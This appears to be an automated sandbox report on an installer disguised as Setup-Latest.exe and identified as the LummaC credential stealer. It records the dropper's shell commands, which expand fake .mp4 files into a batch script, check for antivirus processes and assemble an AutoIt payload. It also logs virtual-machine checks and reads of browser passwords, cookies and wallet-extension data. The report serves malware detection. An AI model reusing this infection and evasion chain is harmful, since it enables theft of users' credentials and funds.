      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\expand.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Setup-Latest.exeStatic file information: File size 1444885 > 1048576
      Source: Setup-Latest.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328

      Persistence and Installation Behavior

      barindex
      Drops PE files with a suspicious file extension
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\562639\Wages.comJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\562639\Wages.comJump to dropped file
      Source: C:\Users\user\Desktop\Setup-Latest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Query firmware table information (likely to detect VMs)
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com TID: 7356Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.com TID: 7340Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\562639Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\562639\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Wide.mp4 Wide.mp4.bat & Wide.mp4.batJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Wide.mp4 Wide.mp4.batJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 562639Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Always.mp4Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Yang" Labor Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 562639\Wages.com + Uniform + Textbooks + Exhibits + Accountability + Fails + Pavilion + Suggestions + Decorating + Volunteers 562639\Wages.comJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Strikes.mp4 + ..\Darkness.mp4 + ..\Oaks.mp4 + ..\Fares.mp4 + ..\Funding.mp4 + ..\Complimentary.mp4 + ..\Relate.mp4 GJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\562639\Wages.com Wages.com GJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: Wages.com, 0000000D.00000000.1763255418.0000000000973000.00000002.00000001.01000000.00000007.sdmp, Decorating.9.dr, Wages.com.1.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\562639\Wages.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
